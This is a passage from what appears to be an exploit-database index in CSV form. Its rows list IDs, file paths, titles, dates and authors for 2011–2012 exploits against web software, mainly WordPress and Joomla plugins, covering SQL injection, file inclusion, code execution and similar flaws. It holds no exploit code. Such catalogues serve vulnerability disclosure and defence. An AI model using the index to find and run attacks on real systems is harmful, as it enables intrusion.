jakesh",php,webapps, -17706,exploits/php/webapps/17706.pl,"OneFileCMS 1.1.1 - Multiple Vulnerabilities",2011-08-21,mr.pr0n,php,webapps, -17707,exploits/php/webapps/17707.txt,"WordPress Plugin MM Duplicate 1.2 - SQL Injection",2011-08-22,"Miroslav Stampar",php,webapps, -17708,exploits/php/webapps/17708.txt,"Web Solutions Wcs2u - SQL Injection",2011-08-22,tempe_mendoan,php,webapps, -17709,exploits/php/webapps/17709.txt,"Bonza Digital Cart Script - SQL Injection",2011-08-22,"Eyup CELIK",php,webapps, -17710,exploits/php/webapps/17710.txt,"DV Cart Shopping Cart software - SQL Injection",2011-08-22,"Eyup CELIK",php,webapps, -17711,exploits/asp/webapps/17711.txt,"Redlab CMS - Multiple SQL Injections",2011-08-22,tempe_mendoan,asp,webapps, -17713,exploits/jsp/webapps/17713.txt,"ManageEngine ServiceDesk Plus 8.0 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2011-08-23,LiquidWorm,jsp,webapps, -17714,exploits/php/webapps/17714.txt,"Help Desk Software 1.1g - Cross-Site Request Forgery (Add Admin)",2011-08-24,G13,php,webapps, -17716,exploits/php/webapps/17716.txt,"WordPress Plugin SendIt 1.5.9 - Blind SQL Injection",2011-08-25,evilsocket,php,webapps, -17720,exploits/php/webapps/17720.txt,"WordPress Plugin Photoracer 1.0 - SQL Injection",2011-08-26,evilsocket,php,webapps, -17722,exploits/php/webapps/17722.rb,"Jcow Social Networking Script 4.2 < 5.2 - Arbitrary Code Execution (Metasploit)",2011-08-26,"Aung Khant",php,webapps, -17724,exploits/php/webapps/17724.txt,"WordPress Plugin Js-appointment 1.5 - SQL Injection",2011-08-27,"Miroslav Stampar",php,webapps, -17725,exploits/php/webapps/17725.txt,"WordPress Plugin MM Forms Community 1.2.3 - SQL Injection",2011-08-27,"Miroslav Stampar",php,webapps, -17728,exploits/php/webapps/17728.txt,"WordPress Plugin Super CAPTCHA 2.2.4 - SQL Injection",2011-08-27,"Miroslav Stampar",php,webapps, -17729,exploits/php/webapps/17729.txt,"WordPress Plugin Collision Testimonials 3.0 - SQL Injection",2011-08-27,"Miroslav Stampar",php,webapps, -17730,exploits/php/webapps/17730.txt,"WordPress Plugin oQey Headers 0.3 - SQL Injection",2011-08-27,"Miroslav Stampar",php,webapps, -17731,exploits/php/webapps/17731.txt,"WordPress Plugin Photoracer 1.0 - Multiple Vulnerabilities",2011-08-27,"Yakir Wizman",php,webapps, -17733,exploits/asp/webapps/17733.txt,"Ferdows CMS Pro 1.1.0 - Multiple Vulnerabilities",2011-08-28,AmnPardaz,asp,webapps, -17734,exploits/php/webapps/17734.txt,"Joomla! Component joomlacontenteditor 2.0.10 - Multiple Vulnerabilities",2011-08-28,AmnPardaz,php,webapps, -17736,exploits/php/webapps/17736.txt,"Joomla! Component mod_simpleFileLister 1.0 - Directory Traversal",2011-08-28,evilsocket,php,webapps, -17737,exploits/php/webapps/17737.txt,"WordPress Plugin Facebook Promotions 1.3.3 - SQL Injection",2011-08-28,"Miroslav Stampar",php,webapps, -17738,exploits/php/webapps/17738.txt,"WordPress Plugin Evarisk 5.1.3.6 - SQL Injection",2011-08-28,"Miroslav Stampar",php,webapps, -17739,exploits/php/webapps/17739.txt,"WordPress Plugin Profiles 2.0 RC1 - SQL Injection",2011-08-28,"Miroslav Stampar",php,webapps, -17740,exploits/php/webapps/17740.txt,"WordPress Plugin mySTAT 2.6 - SQL Injection",2011-08-28,"Miroslav Stampar",php,webapps, -17741,exploits/php/webapps/17741.txt,"Omnistar Mailer - Multiple Vulnerabilities",2011-08-28,Sid3^effects,php,webapps, -17743,exploits/php/webapps/17743.rb,"LifeSize Room - Command Injection (Metasploit)",2011-08-28,"Spencer McIntyre",php,webapps, -17748,exploits/php/webapps/17748.txt,"WordPress Plugin SH Slideshow 3.1.4 - SQL Injection",2011-08-29,"Miroslav Stampar",php,webapps, -17749,exploits/php/webapps/17749.txt,"WordPress Plugin iCopyright(R) Article Tools 1.1.4 - SQL Injection",2011-08-29,"Miroslav Stampar",php,webapps, -17750,exploits/php/webapps/17750.txt,"WordPress Plugin Advertizer 1.0 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps, -17751,exploits/php/webapps/17751.txt,"WordPress Plugin Event Registration 5.4.3 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps, -17752,exploits/php/webapps/17752.txt,"vAuthenticate 3.0.1 - Authentication Bypass",2011-08-30,bd0rk,php,webapps, -17753,exploits/php/webapps/17753.txt,"FileBox File Hosting & Sharing Script 1.5 - SQL Injection",2011-08-30,SubhashDasyam,php,webapps, -17755,exploits/php/webapps/17755.txt,"WordPress Plugin Crawl Rate Tracker 2.0.2 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps, -17756,exploits/php/webapps/17756.txt,"WordPress Plugin Audio Gallery Playlist 0.12 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps, -17757,exploits/php/webapps/17757.txt,"WordPress Plugin yolink Search 1.1.4 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps, -17758,exploits/php/webapps/17758.txt,"WordPress Plugin PureHTML 1.0.0 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps, -17759,exploits/php/webapps/17759.txt,"WordPress Plugin Couponer 1.2 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps, -17760,exploits/php/webapps/17760.txt,"WordPress Plugin grapefile 1.1 - Arbitrary File Upload",2011-08-31,"Hrvoje Spoljar",php,webapps, -17761,exploits/php/webapps/17761.txt,"WordPress Plugin image Gallery with Slideshow 1.5 - Multiple Vulnerabilities",2011-08-31,"Hrvoje Spoljar",php,webapps, -17763,exploits/php/webapps/17763.txt,"WordPress Plugin Donation 1.0 - SQL Injection",2011-09-01,"Miroslav Stampar",php,webapps, -17764,exploits/php/webapps/17764.txt,"WordPress Plugin Bannerize 2.8.6 - SQL Injection",2011-09-01,"Miroslav Stampar",php,webapps, -17766,exploits/windows/webapps/17766.txt,"NetSaro Enterprise Messenger 2.0 - Multiple Vulnerabilities",2011-09-01,"Narendra Shinde",windows,webapps, -17767,exploits/php/webapps/17767.txt,"WordPress Plugin SearchAutocomplete 1.0.8 - SQL Injection",2011-09-01,"Miroslav Stampar",php,webapps, -17771,exploits/php/webapps/17771.txt,"WordPress Plugin VideoWhisper Video Presentation 1.1 - SQL Injection",2011-09-02,"Miroslav Stampar",php,webapps, -17773,exploits/php/webapps/17773.txt,"WordPress Plugin Facebook Opengraph Meta 1.0 - SQL Injection",2011-09-03,"Miroslav Stampar",php,webapps, -17774,exploits/php/webapps/17774.txt,"openads-2.0.11 - Remote File Inclusion",2011-09-03,"HaCkErS eV!L",php,webapps, -17778,exploits/php/webapps/17778.txt,"WordPress Plugin Zotpress 4.4 - SQL Injection",2011-09-04,"Miroslav Stampar",php,webapps, -17779,exploits/php/webapps/17779.txt,"WordPress Plugin oQey Gallery 0.4.8 - SQL Injection",2011-09-05,"Miroslav Stampar",php,webapps, -17782,exploits/php/webapps/17782.txt,"Elite Gaming Ladders 3.6 - SQL Injection",2011-09-05,J.O,php,webapps, -17786,exploits/php/webapps/17786.txt,"Webmobo WB News System - Blind SQL Injection",2011-09-05,"Eyup CELIK",php,webapps, -17789,exploits/php/webapps/17789.txt,"WordPress Plugin Tweet Old Post 3.2.5 - SQL Injection",2011-09-06,sherl0ck_,php,webapps, -17790,exploits/php/webapps/17790.txt,"WordPress Plugin post highlights 2.2 - SQL Injection",2011-09-06,"Miroslav Stampar",php,webapps, -17791,exploits/php/webapps/17791.txt,"WordPress Plugin KNR Author List Widget 2.0.0 - SQL Injection",2011-09-06,"Miroslav Stampar",php,webapps, -17792,exploits/php/webapps/17792.txt,"PlaySms 0.9.5.2 - Remote File Inclusion",2011-09-06,NoGe,php,webapps, -17793,exploits/php/webapps/17793.txt,"WordPress Plugin SCORM Cloud 1.0.6.6 - SQL Injection",2011-09-07,"Miroslav Stampar",php,webapps, -17794,exploits/php/webapps/17794.txt,"WordPress Plugin Eventify - Simple Events 1.7.f SQL Injection",2011-09-07,"Miroslav Stampar",php,webapps, -17797,exploits/php/webapps/17797.txt,"WordPress Plugin Paid Downloads 2.01 - SQL Injection",2011-09-08,"Miroslav Stampar",php,webapps, -17798,exploits/php/webapps/17798.txt,"WordPress Plugin Community Events 1.2.1 - SQL Injection",2011-09-08,"Miroslav Stampar",php,webapps, -17800,exploits/php/webapps/17800.txt,"AM4SS 1.2 - Cross-Site Request Forgery (Add Admin)",2011-09-08,"red virus",php,webapps, -17801,exploits/php/webapps/17801.rb,"WordPress Plugin 1 Flash Gallery 1.30 < 1.5.7a - Arbitrary File Upload (Metasploit)",2011-09-08,"Ben Schmidt",php,webapps, -21787,exploits/php/webapps/21787.rb,"MyAuth3 - Blind SQL Injection",2012-10-07,"Marcio Almeida",php,webapps, -17807,exploits/php/webapps/17807.txt,"OpenCart 1.5.1.2 - Blind SQL Injection",2011-09-08,"RiRes Walid",php,webapps, -17808,exploits/php/webapps/17808.txt,"WordPress Plugin WP-Filebase Download Manager 0.2.9 - SQL Injection",2011-09-09,"Miroslav Stampar",php,webapps, -17809,exploits/php/webapps/17809.txt,"WordPress Plugin A to Z Category Listing 1.3 - SQL Injection",2011-09-09,"Miroslav Stampar",php,webapps, -17811,exploits/php/webapps/17811.txt,"MYRE Real Estate Software - Multiple Vulnerabilities",2011-09-09,"SecPod Research",php,webapps, -17813,exploits/php/webapps/17813.txt,"Xataface WebAuction and Xataface Librarian DB - Multiple Vulnerabilities",2011-09-09,"SecPod Research",php,webapps, -17814,exploits/php/webapps/17814.txt,"WordPress Plugin Event Registration 5.44 - SQL Injection",2011-09-09,serk,php,webapps, -17816,exploits/php/webapps/17816.txt,"WordPress Plugin Tune Library 2.17 - SQL Injection",2011-09-10,"Miroslav Stampar",php,webapps, -17818,exploits/php/webapps/17818.txt,"TomatoCart 1.1 - Authenticated Local File Inclusion",2011-09-12,brain[pillow],php,webapps, -17822,exploits/php/webapps/17822.txt,"PHP Support Tickets 2.2 - Code Execution",2011-09-12,brain[pillow],php,webapps, -17823,exploits/php/webapps/17823.txt,"NetCat CMS - Multiple Vulnerabilities",2011-09-12,brain[pillow],php,webapps, -17824,exploits/php/webapps/17824.txt,"Slaed CMS - Code Execution",2011-09-12,brain[pillow],php,webapps, -17825,exploits/php/webapps/17825.txt,"AstroCMS - Multiple Vulnerabilities",2011-09-12,brain[pillow],php,webapps, -17829,exploits/php/webapps/17829.txt,"dotProject 2.1.5 - SQL Injection",2011-09-13,sherl0ck_,php,webapps, -17828,exploits/php/webapps/17828.txt,"WordPress Plugin Forum Server 1.7 - SQL Injection",2011-09-13,"Miroslav Stampar",php,webapps, -17832,exploits/php/webapps/17832.txt,"WordPress Plugin E-Commerce 3.8.6 - SQL Injection",2011-09-14,"Miroslav Stampar",php,webapps, -17840,exploits/windows/webapps/17840.txt,"Cogent DataHub 7.1.1.63 - Source Disclosure",2011-09-14,"Luigi Auriemma",windows,webapps, -17846,exploits/jsp/webapps/17846.php,"Nortel Contact Recording Centralized Archive 6.5.1 - SQL Injection",2011-09-15,rgod,jsp,webapps, -17850,exploits/php/webapps/17850.txt,"iBrowser Plugin 1.4.1 - 'lang' Local File Inclusion",2011-09-17,LiquidWorm,php,webapps, -17851,exploits/php/webapps/17851.txt,"iManager Plugin 1.2.8 - 'lang' Local File Inclusion",2011-09-17,LiquidWorm,php,webapps, -17852,exploits/php/webapps/17852.txt,"iManager Plugin 1.2.8 - 'd' Arbitrary File Deletion",2011-09-17,LiquidWorm,php,webapps, -17858,exploits/php/webapps/17858.txt,"WordPress Plugin Filedownload 0.1 - 'download.php' Remote File Disclosure",2011-09-19,Septemb0x,php,webapps, -17859,exploits/php/webapps/17859.txt,"Toko Lite CMS 1.5.2 - 'edit.php' HTTP Response Splitting",2011-09-19,LiquidWorm,php,webapps, -17857,exploits/php/webapps/17857.txt,"WordPress Plugin Count per Day 2.17 - SQL Injection",2011-09-18,"Miroslav Stampar",php,webapps, -17860,exploits/php/webapps/17860.txt,"WordPress Plugin TheCartPress 1.1.1 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps, -17861,exploits/php/webapps/17861.txt,"WordPress Plugin AllWebMenus 1.1.3 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps, -17862,exploits/php/webapps/17862.txt,"WordPress Plugin WPEasyStats 1.8 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps, -17863,exploits/php/webapps/17863.txt,"WordPress Plugin Annonces 1.2.0.0 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps, -17864,exploits/php/webapps/17864.txt,"WordPress Plugin Livesig 0.4 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps, -17865,exploits/php/webapps/17865.txt,"WordPress Plugin Disclosure Policy 1.0 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps, -17866,exploits/php/webapps/17866.txt,"WordPress Plugin Mailing List 1.3.2 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps, -17867,exploits/php/webapps/17867.txt,"WordPress Plugin Zingiri Web Shop 2.2.0 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps, -17868,exploits/php/webapps/17868.txt,"WordPress Plugin Mini Mail Dashboard Widget 1.36 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps, -17869,exploits/php/webapps/17869.txt,"WordPress Plugin Relocate Upload 0.14 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps, -17871,exploits/hardware/webapps/17871.txt,"Cisco TelePresence SOS-11-010 - Multiple Vulnerabilities",2011-09-19,"Sense of Security",hardware,webapps, -17872,exploits/php/webapps/17872.txt,"Multiple WordPress Plugins - 'timthumb.php' File Upload",2011-09-19,"Ben Schmidt",php,webapps, -17873,exploits/windows/webapps/17873.txt,"SharePoint 2007/2010 and DotNetNuke < 6 - File Disclosure (via XEE)",2011-09-20,"Nicolas Gregoire",windows,webapps, -17874,exploits/hardware/webapps/17874.txt,"NETGEAR Wireless Cable Modem Gateway - Authentication Bypass / Cross-Site Request Forgery",2011-09-20,"Sense of Security",hardware,webapps, -17882,exploits/php/webapps/17882.php,"JAKCMS PRO 2.2.5 - Arbitrary File Upload",2011-09-22,EgiX,php,webapps, -17887,exploits/php/webapps/17887.txt,"WordPress Plugin Link Library 5.2.1 - SQL Injection",2011-09-24,"Miroslav Stampar",php,webapps, -17888,exploits/php/webapps/17888.txt,"WordPress Plugin AdRotate 3.6.5 - SQL Injection",2011-09-24,"Miroslav Stampar",php,webapps, -17891,exploits/php/webapps/17891.txt,"WordPress Plugin CevherShare 2.0 - SQL Injection",2011-09-26,bd0rk,php,webapps, -17894,exploits/php/webapps/17894.txt,"WordPress Plugin Mingle Forum 1.0.31 - SQL Injection",2011-09-27,"Miroslav Stampar",php,webapps, -17895,exploits/php/webapps/17895.txt,"Jarida 1.0 - Multiple Vulnerabilities",2011-09-27,"Ptrace Security",php,webapps, -17897,exploits/jsp/webapps/17897.txt,"Omnidocs - Multiple Vulnerabilities",2011-09-27,"Sohil Garg",jsp,webapps, -17900,exploits/asp/webapps/17900.txt,"timelive time and expense tracking 4.1.1 - Multiple Vulnerabilities",2011-09-28,"Nathaniel Carew",asp,webapps, -17898,exploits/php/webapps/17898.txt,"redmind Online-Shop / E-Commerce-System - SQL Injection",2011-09-27,"Indonesian BlackCoder",php,webapps, -17905,exploits/php/webapps/17905.txt,"Typo3 - File Disclosure",2011-09-29,"Number 7",php,webapps, -17906,exploits/php/webapps/17906.txt,"WordPress Plugin Bannerize 2.8.7 - SQL Injection",2011-09-30,"Miroslav Stampar",php,webapps, -17909,exploits/php/webapps/17909.txt,"Marinet CMS - 'room.php' Blind SQL Injection",2011-09-30,"BHG Security Center",php,webapps, -17911,exploits/php/webapps/17911.php,"Feed on Feeds 0.5 - Remote PHP Code Injection",2011-09-30,EgiX,php,webapps, -17919,exploits/php/webapps/17919.txt,"Banana Dance CMS and Wiki - SQL Injection",2011-10-02,Aodrulez,php,webapps, -17920,exploits/php/webapps/17920.txt,"Vivvo CMS - Local File Inclusion",2011-10-02,JaBrOtxHaCkEr,php,webapps, -17921,exploits/asp/webapps/17921.txt,"GotoCode Online Bookstore - Multiple Vulnerabilities",2011-10-03,"Nathaniel Carew",asp,webapps, -17922,exploits/cgi/webapps/17922.rb,"CA Total Defense Suite - reGenerateReports Stored procedure SQL Injection (Metasploit)",2011-10-02,Metasploit,cgi,webapps, -17924,exploits/jsp/webapps/17924.pl,"JBoss & JMX Console - Misconfigured Deployment Scanner",2011-10-03,y0ug,jsp,webapps, -17925,exploits/php/webapps/17925.txt,"Concrete5 CMS < 5.4.2.1 - Multiple Vulnerabilities",2011-10-04,"Ryan Dewhurst",php,webapps, -17926,exploits/php/webapps/17926.txt,"Easy Hosting Control Panel - Admin Authentication Bypass",2011-10-04,Jasman,php,webapps, -17927,exploits/php/webapps/17927.txt,"CF Image Hosting Script 1.3.82 - File Disclosure",2011-10-04,bd0rk,php,webapps, -18033,exploits/php/webapps/18033.txt,"Joomla! Component com_yjcontactus - Local File Inclusion",2011-10-25,MeGo,php,webapps, -17935,exploits/php/webapps/17935.txt,"Tsmim Lessons Library - 'show.php' SQL Injection",2011-10-06,M.Jock3R,php,webapps, -17937,exploits/php/webapps/17937.txt,"URL Shortener Script 1.0 - SQL Injection",2011-10-07,M.Jock3R,php,webapps, -17938,exploits/php/webapps/17938.txt,"EFront 3.6.9 Community Edition - Multiple Vulnerabilities",2011-10-07,IHTeam,php,webapps, -17941,exploits/linux/webapps/17941.rb,"Spreecommerce 0.60.1 - Arbitrary Command Execution (Metasploit)",2011-10-07,Metasploit,linux,webapps, -17943,exploits/php/webapps/17943.txt,"BOOKSolved 1.2.2 - Remote File Disclosure",2011-10-08,bd0rk,php,webapps, -17944,exploits/php/webapps/17944.txt,"Joomla! Component Time Returns 2.0 - SQL Injection",2011-10-08,kaMtiEz,php,webapps, -17946,exploits/php/webapps/17946.txt,"NexusPHP 1.5 - SQL Injection",2011-10-08,flyh4t,php,webapps, -17947,exploits/php/webapps/17947.rb,"Snortreport - '/nmap.php' / 'nbtscan.php' Remote Command Execution (Metasploit)",2011-10-09,Metasploit,php,webapps, -17949,exploits/php/webapps/17949.rb,"MyBB 1.6.4 - Backdoor (Metasploit)",2011-10-09,Metasploit,php,webapps, -17950,exploits/php/webapps/17950.txt,"GotoCode Online Classifieds - Multiple Vulnerabilities",2011-10-09,"Nathaniel Carew",php,webapps, -17951,exploits/php/webapps/17951.txt,"openEngine 2.0 - Multiple Blind SQL Injection Vulnerabilities",2011-10-10,"Stefan Schurtz",php,webapps, -17952,exploits/php/webapps/17952.txt,"KaiBB 2.0.1 - SQL Injection",2011-10-10,"Stefan Schurtz",php,webapps, -17970,exploits/php/webapps/17970.txt,"WordPress Plugin WP-SpamFree Spam Plugin - SQL Injection",2011-10-11,cheki,php,webapps, -17972,exploits/php/webapps/17972.txt,"MyBB MyStatus 3.1 - SQL Injection",2011-10-12,Mario_Vs,php,webapps, -17973,exploits/php/webapps/17973.txt,"WordPress Plugin GD Star Rating 1.9.10 - SQL Injection",2011-10-12,"Miroslav Stampar",php,webapps, -17955,exploits/php/webapps/17955.txt,"Filmis 0.2 Beta - Multiple Vulnerabilities",2011-10-10,M.Jock3R,php,webapps, -17956,exploits/php/webapps/17956.txt,"6kbbs - Multiple Vulnerabilities",2011-10-10,"labs insight",php,webapps, -17957,exploits/php/webapps/17957.txt,"Roundcube Webmail 0.3.1 - Cross-Site Request Forgery / SQL Injection",2011-10-10,"Smith Falcon",php,webapps, -17958,exploits/php/webapps/17958.txt,"cotonti CMS 0.9.4 - Multiple Vulnerabilities",2011-10-10,LiquidWorm,php,webapps, -17959,exploits/php/webapps/17959.txt,"POSH - Multiple Vulnerabilities",2011-10-10,Crashfr,php,webapps, -17961,exploits/php/webapps/17961.txt,"MyBB Advanced Forum Signatures - 'afsignatures-2.0.4' SQL Injection",2011-10-10,Mario_Vs,php,webapps, -17962,exploits/php/webapps/17962.txt,"MyBB Forum Userbar Plugin (Userbar 2.2) - SQL Injection",2011-10-10,Mario_Vs,php,webapps, -17980,exploits/php/webapps/17980.txt,"WordPress Plugin Contact Form 2.7.5 - SQL Injection",2011-10-14,Skraps,php,webapps, -17983,exploits/php/webapps/17983.txt,"WordPress Plugin Photo Album Plus 4.1.1 - SQL Injection",2011-10-15,Skraps,php,webapps, -17984,exploits/php/webapps/17984.txt,"Ruubikcms 1.1.0 - '/extra/image.php' Local File Inclusion",2011-10-16,"Sangyun YOO",php,webapps, -17987,exploits/php/webapps/17987.txt,"WordPress Plugin BackWPUp 2.1.4 - Code Execution",2011-10-17,"Sense of Security",php,webapps, -17994,exploits/php/webapps/17994.php,"Dolphin 7.0.7 - 'member_menu_queries.php' Remote PHP Code Injection",2011-10-18,EgiX,php,webapps, -17989,exploits/php/webapps/17989.txt,"Dominant Creature BBG/RPG Browser Game - Persistent Cross-Site Scripting",2011-10-17,M.Jock3R,php,webapps, -17992,exploits/php/webapps/17992.txt,"GNUBoard 4.33.02 - 'tp.php?PATH_INFO' SQL Injection",2011-10-17,flyh4t,php,webapps, -17995,exploits/php/webapps/17995.txt,"Joomla! Plugin NoNumber Framework - Multiple Vulnerabilities",2011-10-18,jdc,php,webapps, -17997,exploits/php/webapps/17997.txt,"Yet Another CMS 1.0 - SQL Injection / Cross-Site Scripting",2011-10-19,"Stefan Schurtz",php,webapps, -17998,exploits/php/webapps/17998.txt,"Openemr-4.1.0 - SQL Injection",2011-10-19,"I2sec-dae jin Oh",php,webapps, -17999,exploits/php/webapps/17999.txt,"WHMCompleteSolution (WHMCS) 3.x.x < 4.0.x - 'cart.php' Local File Disclosure",2011-10-19,"Lagripe-Dz & Mca-Crb",php,webapps, -18000,exploits/php/webapps/18000.txt,"1024 CMS 1.1.0 Beta - 'force_download.php' Local File Inclusion",2011-10-19,"Sangyun YOO",php,webapps, -18001,exploits/php/webapps/18001.txt,"CMS mini 0.2.2 - Local File Inclusion",2011-10-20,BeopSeong/I2Sec,php,webapps, -18002,exploits/php/webapps/18002.txt,"Uiga Personal Portal - Multiple Vulnerabilities",2011-10-20,"Eyup CELIK",php,webapps, -18003,exploits/php/webapps/18003.txt,"fims File Management System 1.2.1a - Multiple Vulnerabilities",2011-10-20,Skraps,php,webapps, -18004,exploits/php/webapps/18004.txt,"Simple Free PHP Forum Script - SQL Injection",2011-10-20,Skraps,php,webapps, -18005,exploits/windows/webapps/18005.txt,"OCS Inventory NG 2.0.1 - Persistent Cross-Site Scripting",2011-10-20,"Nicolas DEROUET",windows,webapps, -18009,exploits/asp/webapps/18009.txt,"Pre Studio Business Cards Designer - SQL Injection",2011-10-20,dr_zig,asp,webapps, -18012,exploits/multiple/webapps/18012.txt,"Metasploit 4.1.0 Web UI - Persistent Cross-Site Scripting",2011-10-20,"Stefan Schurtz",multiple,webapps, -18013,exploits/windows/webapps/18013.py,"Cyclope Internet Filtering Proxy 4.0 - Persistent Cross-Site Scripting",2011-10-20,loneferret,windows,webapps, -18018,exploits/php/webapps/18018.php,"SportsPHool 1.0 - Remote File Inclusion",2011-10-21,cr4wl3r,php,webapps, -18020,exploits/php/webapps/18020.txt,"Jara 1.6 - SQL Injection",2011-10-23,muuratsalo,php,webapps, -18021,exploits/php/webapps/18021.php,"phpLDAPadmin 1.2.1.1 - Remote PHP Code Injection (1)",2011-10-23,EgiX,php,webapps, -18022,exploits/php/webapps/18022.txt,"InverseFlow 2.4 - Cross-Site Request Forgery (Add Admin)",2011-10-23,"EjRaM HaCkEr",php,webapps, -18042,exploits/php/webapps/18042.txt,"Joomla! Component Techfolio 1.0 - SQL Injection",2011-10-28,"Chris Russell",php,webapps, -18046,exploits/php/webapps/18046.txt,"Joomla! Component Barter Sites 1.3 - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps, -18031,exploits/php/webapps/18031.rb,"phpLDAPadmin 1.2.1.1 - Remote PHP Code Injection (Metasploit) (2)",2011-10-25,Metasploit,php,webapps, -18032,exploits/windows/webapps/18032.rb,"SAP Management Console - OSExecute Payload Execution (Metasploit)",2011-10-24,Metasploit,windows,webapps, -18035,exploits/php/webapps/18035.txt,"Online Subtitles Workshop - Cross-Site Scripting",2011-10-26,M.Jock3R,php,webapps, -18036,exploits/php/webapps/18036.txt,"eFront 3.6.10 (build 11944) - Multiple Vulnerabilities",2011-10-27,EgiX,php,webapps, -18037,exploits/php/webapps/18037.rb,"phpScheduleIt 1.2.10 - 'reserve.php' Arbitrary Code Injection (Metasploit)",2011-10-26,Metasploit,php,webapps, -18039,exploits/php/webapps/18039.txt,"WordPress Plugin wptouch - SQL Injection",2011-10-27,longrifle0x,php,webapps, -18045,exploits/php/webapps/18045.txt,"PHP Photo Album 0.4.1.16 - Multiple Disclosure Vulnerabilities",2011-10-29,"BHG Security Center",php,webapps, -18047,exploits/php/webapps/18047.txt,"Joomla! Component com_jeemasms 3.2 - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps, -18048,exploits/php/webapps/18048.txt,"Joomla! Component Vik Real Estate 1.0 - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps, -18050,exploits/php/webapps/18050.txt,"Joomla! Component HM Community - Multiple Vulnerabilities",2011-10-31,"599eme Man",php,webapps, -18053,exploits/php/webapps/18053.txt,"WordPress Theme classipress 3.1.4 - Persistent Cross-Site Scripting",2011-10-31,"Paul Loftness",php,webapps, -18055,exploits/php/webapps/18055.txt,"WordPress Plugin Glossary - SQL Injection",2011-10-31,longrifle0x,php,webapps, -18056,exploits/php/webapps/18056.txt,"jbShop e107 7 CMS Plugin - SQL Injection",2011-10-31,"Robert Cooper",php,webapps, -18058,exploits/php/webapps/18058.txt,"Joomla! Component Alameda 1.0 - SQL Injection",2011-10-31,kaMtiEz,php,webapps, -18061,exploits/hardware/webapps/18061.txt,"ZTE ZXDSL 831IIV7.5.0a_Z29_OV - Multiple Vulnerabilities",2011-11-01,"mehdi boukazoula",hardware,webapps, -18063,exploits/php/webapps/18063.txt,"BST (BestShopPro) - 'nowosci.php' Multiple Vulnerabilities",2011-11-02,CoBRa_21,php,webapps, -18065,exploits/php/webapps/18065.txt,"SetSeed CMS 5.8.20 - 'loggedInUser' SQL Injection",2011-11-02,LiquidWorm,php,webapps, -18066,exploits/php/webapps/18066.txt,"CaupoShop Pro (2.x < 3.70) Classic 3.01 - Local File Inclusion",2011-11-02,"Rami Salama",php,webapps, -18069,exploits/php/webapps/18069.txt,"Jara 1.6 - Multiple Vulnerabilities",2011-11-03,Or4nG.M4N,php,webapps, -18070,exploits/php/webapps/18070.txt,"Web File Browser 0.4b14 - File Download",2011-11-03,"Sangyun YOO",php,webapps, -18075,exploits/php/webapps/18075.txt,"Ajax File and Image Manager 1.0 Final - Remote Code Execution",2011-11-04,EgiX,php,webapps, -18076,exploits/php/webapps/18076.txt,"Advanced Poll 2.02 - SQL Injection",2011-11-04,"Yassin Aboukir",php,webapps, -18077,exploits/windows/webapps/18077.txt,"HP Data Protector Media Operations 6.20 - Directory Traversal",2011-11-04,"Luigi Auriemma",windows,webapps, -18081,exploits/php/webapps/18081.txt,"WHMCompleteSolution (WHMCS) 3.x.x - 'clientarea.php' Local File Disclosure",2011-11-04,"red virus",php,webapps, -18083,exploits/php/webapps/18083.php,"ZenPhoto 1.4.1.4 - 'ajax_create_folder.php' Remote Code Execution",2011-11-05,EgiX,php,webapps, -18084,exploits/php/webapps/18084.php,"PHPMyFAQ 2.7.0 - 'ajax_create_folder.php' Remote Code Execution",2011-11-05,EgiX,php,webapps, -18085,exploits/php/webapps/18085.php,"aidiCMS 3.55 - 'ajax_create_folder.php' Remote Code Execution",2011-11-05,EgiX,php,webapps, -18088,exploits/php/webapps/18088.txt,"WHMCompleteSolution 3.x/4.x - Multiple Vulnerabilities",2011-11-07,ZxH-Labs,php,webapps, -18090,exploits/php/webapps/18090.txt,"LabStoRe 1.5.4 - SQL Injection",2011-11-07,muuratsalo,php,webapps, -18091,exploits/php/webapps/18091.txt,"OrderSys 1.6.4 - SQL Injection",2011-11-07,muuratsalo,php,webapps, -18095,exploits/php/webapps/18095.txt,"11in1 CMS 1.0.1 - 'do.php' CRLF Injection",2011-11-08,LiquidWorm,php,webapps, -18099,exploits/php/webapps/18099.txt,"osCSS2 - '_ID' Local file Inclusion",2011-11-09,"Stefan Schurtz",php,webapps, -18100,exploits/php/webapps/18100.txt,"labwiki 1.1 - Multiple Vulnerabilities",2011-11-09,muuratsalo,php,webapps, -18101,exploits/hardware/webapps/18101.pl,"COMTREND CT-5624 Router - Root/Support Password Disclosure/Change",2011-11-09,"Todor Donev",hardware,webapps, -18108,exploits/php/webapps/18108.rb,"Support Incident Tracker 3.65 - Remote Command Execution (Metasploit)",2011-11-13,Metasploit,php,webapps, -18110,exploits/php/webapps/18110.txt,"Mambo 4.x - 'Zorder' SQL Injection",2011-11-13,"KraL BeNiM",php,webapps, -18111,exploits/php/webapps/18111.php,"WordPress Plugin Zingiri 2.2.3 - 'ajax_save_name.php' Remote Code Execution",2011-11-13,EgiX,php,webapps, -18132,exploits/php/webapps/18132.php,"Support Incident Tracker 3.65 - 'translate.php' Remote Code Execution",2011-11-19,EgiX,php,webapps, -18114,exploits/php/webapps/18114.txt,"WordPress Plugin AdRotate 3.6.6 - SQL Injection",2011-11-14,"Miroslav Stampar",php,webapps, -18115,exploits/php/webapps/18115.txt,"Pixie CMS 1.01 < 1.04 - Blind SQL Injections",2011-11-14,Piranha,php,webapps, -18117,exploits/multiple/webapps/18117.txt,"Authenex A-Key/ASAS Web Management Control 3.1.0.2 - Blind SQL 